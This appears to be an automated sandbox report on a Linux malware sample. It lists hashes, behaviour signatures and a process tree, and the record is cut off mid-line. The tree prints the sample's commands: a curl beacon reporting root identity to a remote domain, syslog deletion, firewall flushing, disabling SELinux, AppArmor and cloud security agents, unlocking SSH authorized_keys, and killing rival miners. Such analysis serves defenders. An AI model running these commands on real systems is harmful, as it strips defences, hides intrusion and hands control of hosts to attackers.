71b478d4ad418cfb6ec620ea213a3f5c6a64bd34f23d8f43de81df01465bcbad

Analysis

max time kernel
21s
max time network
10s
platform
debian-9_armhf
resource
debian9-armhf-20240226-en
resource tags

arch:armhfimage:debian9-armhf-20240226-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
07-03-2024 08:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b84ec8d2286ecb64f4164633be39421b
Size

60KB
MD5

b84ec8d2286ecb64f4164633be39421b
SHA1

7b09fb48eefb27acadf53aed331a24211ce78a72
SHA256

71b478d4ad418cfb6ec620ea213a3f5c6a64bd34f23d8f43de81df01465bcbad
SHA512

f31cbcf9b8a6e935f8ca8341aac462c059a1c08ddeba4986fbd7d2224917bdbaad21d1fb0dfb437b9385998c74e856c36387e7785018f4bea8cc4a217ce87844
SSDEEP

1536:/F2cc2/ndOQvL0KKGdAkKFOmm5air0TI9:/F2ccQh2v47ccyI9

Score

7^/10

antivm evasion

Malware Config

Signatures

Deletes system logs 1 TTPs 1 IoCs

Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.

evasion

Indicator Removal

T1070

Processes:

description	ioc	Process
File deleted	/var/log/syslog	rm

Flushes firewall rules 1 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

Processes:

iptables

pid	Process
678	iptables

Attempts to change immutable files 41 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

Processes:

xargsxargsxargsxargsxargsxargssystemctlxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargsxargschattrxargsxargsxargschattrgrepxargsxargsxargsgrepsystemctlxargsxargsxargschattrchattrxargsxargsxargsxargs

pid	Process
862	xargs
869	xargs
917	xargs
924	xargs
933	xargs
940	xargs
775	systemctl
841	xargs
999	xargs
969	xargs
832	xargs
883	xargs
848	xargs
903	xargs
910	xargs
964	xargs
979	xargs
797	xargs
814	xargs
897	xargs
958	xargs
692	chattr
820	xargs
974	xargs
984	xargs
673	chattr
698	grep
876	xargs
890	xargs
994	xargs
700	grep
724	systemctl
808	xargs
855	xargs
1004	xargs
674	chattr
693	chattr
951	xargs
989	xargs
802	xargs
826	xargs

Checks CPU configuration 1 TTPs 1 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

Virtualization/Sandbox Evasion

T1497

Processes:

curl

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl

Disables AppArmor 28 IoCs

Disables AppArmor security module.

Processes:

systemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctlsystemctl

pid	Process
746	systemctl
746	systemctl
746	systemctl
746	systemctl
745	systemctl
772	systemctl
775	systemctl
791	systemctl
702	systemctl
702	systemctl
770	systemctl
788	systemctl
789	systemctl
792	systemctl
702	systemctl
777	systemctl
746	systemctl
746	systemctl
786	systemctl
702	systemctl
751	systemctl
760	systemctl
762	systemctl
784	systemctl
790	systemctl
702	systemctl
702	systemctl
754	systemctl

Disables SELinux 1 IoCs

Disables SELinux security module.

Processes:

setenforce

pid	Process
701	setenforce

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 24 IoCs

System Information Discovery

T1082

Processes:

pspspspskillpspssysctlexim4pspspspspsexim4pspspspssysctlpspspsps

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	kill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	sysctl
File opened for reading	/sys/devices/system/cpu/online	exim4
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	exim4
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	sysctl
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Enumerates kernel/hardware configuration 1 TTPs 32 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

Processes:

description	ioc	Process
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

pspspsawkpspspspspspspspspspspspspspssystemctlawksystemctlsystemctlpsps

description	ioc	Process
File opened for reading	/proc/19/cmdline	ps
File opened for reading	/proc/19/stat	ps
File opened for reading	/proc/12/cmdline	ps
File opened for reading	/proc/163/cmdline	ps
File opened for reading	/proc/274/stat	ps
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/648/status	ps
File opened for reading	/proc/16/cmdline	ps
File opened for reading	/proc/7/status	ps
File opened for reading	/proc/17/status	ps
File opened for reading	/proc/147/status	ps
File opened for reading	/proc/29/status	ps
File opened for reading	/proc/14/cmdline	ps
File opened for reading	/proc/13/cmdline	ps
File opened for reading	/proc/25/status	ps
File opened for reading	/proc/276/status	ps
File opened for reading	/proc/20/stat	ps
File opened for reading	/proc/29/status	ps
File opened for reading	/proc/163/status	ps
File opened for reading	/proc/598/cmdline	ps
File opened for reading	/proc/10/status	ps
File opened for reading	/proc/16/cmdline	ps
File opened for reading	/proc/25/status	ps
File opened for reading	/proc/577/stat	ps
File opened for reading	/proc/7/status	ps
File opened for reading	/proc/112/status	ps
File opened for reading	/proc/15/cmdline	ps
File opened for reading	/proc/637/cmdline	ps
File opened for reading	/proc/270/cmdline	ps
File opened for reading	/proc/43/status	ps
File opened for reading	/proc/642/stat	ps
File opened for reading	/proc/597/status	ps
File opened for reading	/proc/635/stat	ps
File opened for reading	/proc/102/status	ps
File opened for reading	/proc/966/cmdline	ps
File opened for reading	/proc/680/cmdline	ps
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/139/cmdline	ps
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/7/cmdline	ps
File opened for reading	/proc/305/cmdline	ps
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/1/status	ps
File opened for reading	/proc/598/status	ps
File opened for reading	/proc/23/status	ps
File opened for reading	/proc/598/status	ps
File opened for reading	/proc/901/cmdline	ps
File opened for reading	/proc/110/status	ps
File opened for reading	/proc/276/cmdline	ps
File opened for reading	/proc/219/cmdline	ps
File opened for reading	/proc/278/stat	ps
File opened for reading	/proc/10/status	ps
File opened for reading	/proc/1/stat	ps
File opened for reading	/proc/25/cmdline	ps
File opened for reading	/proc/4/stat	ps
File opened for reading	/proc/23/cmdline	ps
File opened for reading	/proc/22/stat	ps
File opened for reading	/proc/26/cmdline	ps
File opened for reading	/proc/42/status	ps
File opened for reading	/proc/25/stat	ps
File opened for reading	/proc/stat	ps
File opened for reading	/proc/147/stat	ps
File opened for reading	/proc/274/status	ps

/tmp/b84ec8d2286ecb64f4164633be39421b
/tmp/b84ec8d2286ecb64f4164633be39421b
1⤵
PID:642
- /usr/bin/id
  id
  2⤵
  PID:644
- /usr/bin/curl
  curl "http://oracle.zzhreceive.top/b2f628/idcheck/uid=0(root) gid=0(root) groups=0(root)"
  2⤵
  - Checks CPU configuration
  PID:647
- /bin/mkdir
  mkdir /var/tmp/.system -p
  2⤵
  PID:669
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  - Deletes system logs
  PID:671
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  - Attempts to change immutable files
  PID:673
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  - Attempts to change immutable files
  PID:674
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:678
- /usr/bin/sudo
  sudo sysctl "kernel.nmi_watchdog=0"
  2⤵
  PID:682
- - /sbin/sysctl
    sysctl "kernel.nmi_watchdog=0"
    3⤵
    - Reads CPU attributes
    PID:690
- /sbin/sysctl
  sysctl "kernel.nmi_watchdog=0"
  2⤵
  - Reads CPU attributes
  PID:691
- /usr/bin/chattr
  chattr -iae /root/.ssh/
  2⤵
  - Attempts to change immutable files
  PID:692
- /usr/bin/chattr
  chattr -iae /root/.ssh/authorized_keys
  2⤵
  - Attempts to change immutable files
  PID:693
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:694
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:695
- /bin/rm
  rm -rf /tmp/keys
  2⤵
  PID:696
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:697
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  - Attempts to change immutable files
  PID:698
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  - Attempts to change immutable files
  PID:700
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:699
- /usr/sbin/setenforce
  setenforce 0
  2⤵
  - Disables SELinux
  PID:701
- /usr/sbin/service
  service apparmor stop
  2⤵
  PID:702
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:703
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:704
- - /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    - Enumerates kernel/hardware configuration
    PID:705
- - /bin/systemctl
    systemctl -p Triggers show dbus.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:714
- - /bin/systemctl
    systemctl -p Triggers show ssh.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:717
- - /bin/systemctl
    systemctl -p Triggers show syslog.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:719
- - /bin/systemctl
    systemctl -p Triggers show systemd-fsckd.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:722
- - /bin/systemctl
    systemctl -p Triggers show systemd-initctl.socket
    3⤵
    - Attempts to change immutable files
    - Enumerates kernel/hardware configuration
    PID:724
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald-audit.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:726
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald-dev-log.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:729
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:731
- - /bin/systemctl
    systemctl -p Triggers show systemd-networkd.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:733
- - /bin/systemctl
    systemctl -p Triggers show systemd-rfkill.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:736
- - /bin/systemctl
    systemctl -p Triggers show systemd-udevd-control.socket
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:739
- - /bin/systemctl
    systemctl -p Triggers show systemd-udevd-kernel.socket
    3⤵
    - Enumerates kernel/hardware configuration
    PID:741
- /usr/local/sbin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:702
- /usr/local/bin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:702
- /usr/sbin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:702
- /usr/bin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:702
- /sbin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  PID:702
- /bin/systemctl
  systemctl stop apparmor.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:702
- /bin/systemctl
  systemctl disable apparmor
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:745
- /usr/sbin/service
  service aliyun.service stop
  2⤵
  PID:746
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:748
- - /usr/bin/basename
    basename /usr/sbin/service
    3⤵
    PID:750
- - /bin/systemctl
    systemctl --quiet is-active multi-user.target
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:751
- - /bin/systemctl
    systemctl -p Triggers show dbus.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:760
- - /bin/systemctl
    systemctl -p Triggers show ssh.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:762
- - /bin/systemctl
    systemctl -p Triggers show syslog.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:770
- - /bin/systemctl
    systemctl -p Triggers show systemd-fsckd.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:772
- - /bin/systemctl
    systemctl -p Triggers show systemd-initctl.socket
    3⤵
    - Attempts to change immutable files
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:775
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald-audit.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:777
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald-dev-log.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:784
- - /bin/systemctl
    systemctl -p Triggers show systemd-journald.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:786
- - /bin/systemctl
    systemctl -p Triggers show systemd-networkd.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:788
- - /bin/systemctl
    systemctl -p Triggers show systemd-rfkill.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:789
- - /bin/systemctl
    systemctl -p Triggers show systemd-udevd-control.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:790
- - /bin/systemctl
    systemctl -p Triggers show systemd-udevd-kernel.socket
    3⤵
    - Disables AppArmor
    - Enumerates kernel/hardware configuration
    PID:791
- /usr/local/sbin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:746
- /usr/local/bin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:746
- /usr/sbin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:746
- /usr/bin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:746
- /sbin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  PID:746
- /bin/systemctl
  systemctl stop aliyun.service.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:746
- /bin/systemctl
  systemctl disable aliyun.service
  2⤵
  - Disables AppArmor
  - Enumerates kernel/hardware configuration
  PID:792
- /bin/grep
  grep 185.71.65.238
  2⤵
  PID:794
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:795
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:796
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:797
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:800
- /bin/grep
  grep 140.82.52.87
  2⤵
  PID:799
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:801
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:802
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:805
- /bin/grep
  grep :443
  2⤵
  PID:804
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:806
- /bin/grep
  grep -v -
  2⤵
  PID:807
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:808
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:811
- /bin/grep
  grep :23
  2⤵
  PID:810
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:812
- /bin/grep
  grep -v -
  2⤵
  PID:813
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:814
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:817
- /bin/grep
  grep :443
  2⤵
  PID:816
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  - Reads runtime system information
  PID:818
- /bin/grep
  grep -v -
  2⤵
  PID:819
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:820
- /bin/grep
  grep :143
  2⤵
  PID:822
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:823
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:824
- /bin/grep
  grep -v -
  2⤵
  PID:825
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:826
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:829
- /bin/grep
  grep :2222
  2⤵
  PID:828
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:830
- /bin/grep
  grep -v -
  2⤵
  PID:831
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:832
- /bin/grep
  grep :3333
  2⤵
  PID:836
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:837
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:839
- /bin/grep
  grep -v -
  2⤵
  PID:840
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:841
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  - Reads runtime system information
  PID:845
- /bin/grep
  grep :3389
  2⤵
  PID:844
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:846
- /bin/grep
  grep -v -
  2⤵
  PID:847
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:848
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:852
- /bin/grep
  grep :5555
  2⤵
  PID:851
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:853
- /bin/grep
  grep -v -
  2⤵
  PID:854
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:855
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:859
- /bin/grep
  grep :6666
  2⤵
  PID:858
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:860
- /bin/grep
  grep -v -
  2⤵
  PID:861
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:862
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:866
- /bin/grep
  grep :6665
  2⤵
  PID:865
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:867
- /bin/grep
  grep -v -
  2⤵
  PID:868
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:869
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:873
- /bin/grep
  grep :6667
  2⤵
  PID:872
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:874
- /bin/grep
  grep -v -
  2⤵
  PID:875
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:876
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:880
- /bin/grep
  grep :7777
  2⤵
  PID:879
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:881
- /bin/grep
  grep -v -
  2⤵
  PID:882
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:883
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:887
- /bin/grep
  grep :8444
  2⤵
  PID:886
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:888
- /bin/grep
  grep -v -
  2⤵
  PID:889
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:890
- /bin/grep
  grep :3347
  2⤵
  PID:893
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:894
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:895
- /bin/grep
  grep -v -
  2⤵
  PID:896
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:897
- /bin/grep
  grep -v grep
  2⤵
  PID:900
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:899
- /bin/grep
  grep :3333
  2⤵
  PID:901
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:902
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:903
- /bin/grep
  grep -v grep
  2⤵
  PID:907
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:906
- /bin/grep
  grep :5555
  2⤵
  PID:908
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:909
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:910
- /bin/grep
  grep "kworker -c\\"
  2⤵
  PID:915
- /bin/grep
  grep -v grep
  2⤵
  PID:914
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:913
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:916
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:917
- /bin/grep
  grep log_
  2⤵
  PID:922
- /bin/grep
  grep -v grep
  2⤵
  PID:921
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:920
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:923
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:924
- /bin/grep
  grep -v grep
  2⤵
  PID:930
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:929
- /bin/grep
  grep systemten
  2⤵
  PID:931
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:932
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:933
- /bin/grep
  grep -v grep
  2⤵
  PID:937
- /bin/grep
  grep netns
  2⤵
  PID:938
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:936
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:939
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:940
- - /usr/local/sbin/kill
    kill -9 14
    3⤵
    PID:944
- - /usr/local/bin/kill
    kill -9 14
    3⤵
    PID:944
- - /usr/sbin/kill
    kill -9 14
    3⤵
    PID:944
- - /usr/bin/kill
    kill -9 14
    3⤵
    PID:944
- - /sbin/kill
    kill -9 14
    3⤵
    PID:944
- - /bin/kill
    kill -9 14
    3⤵
    - Reads CPU attributes
    PID:944
- /bin/grep
  grep -v grep
  2⤵
  PID:948
- /bin/grep
  grep voltuned
  2⤵
  PID:949
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:947
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:950
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:951
- /bin/grep
  grep -v grep
  2⤵
  PID:955
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:954
- /bin/grep
  grep darwin
  2⤵
  PID:956
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:957
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:958
- /bin/grep
  grep -v grep
  2⤵
  PID:961
- /bin/grep
  grep /tmp/dl
  2⤵
  PID:962
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:960
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:963
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:964
- /bin/grep
  grep -v grep
  2⤵
  PID:966
- /bin/grep
  grep /tmp/ddg
  2⤵
  PID:967
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:965
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:968
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:969
- /bin/grep
  grep -v grep
  2⤵
  PID:971
- /bin/grep
  grep /tmp/pprt
  2⤵
  PID:972
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:970
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:973
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:974
- /bin/grep
  grep -v grep
  2⤵
  PID:976
- /bin/grep
  grep /tmp/ppol
  2⤵
  PID:977
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:975
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:978
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:979
- /bin/grep
  grep -v grep
  2⤵
  PID:981
- /bin/grep
  grep "/tmp/65ccE*"
  2⤵
  PID:982
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:980
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:983
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:984
- /bin/grep
  grep -v grep
  2⤵
  PID:986
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:985
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:988
- /bin/grep
  grep "/tmp/jmx*"
  2⤵
  PID:987
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:989
- /bin/grep
  grep -v grep
  2⤵
  PID:991
- /bin/grep
  grep "/tmp/2Ne80*"
  2⤵
  PID:992
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:990
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:993
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:994
- /bin/grep
  grep -v grep
  2⤵
  PID:996
- /bin/grep
  grep IOFoqIgyC0zmf2UR
  2⤵
  PID:997
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:995
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:998
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:999
- /bin/grep
  grep -v grep
  2⤵
  PID:1001
- /bin/grep
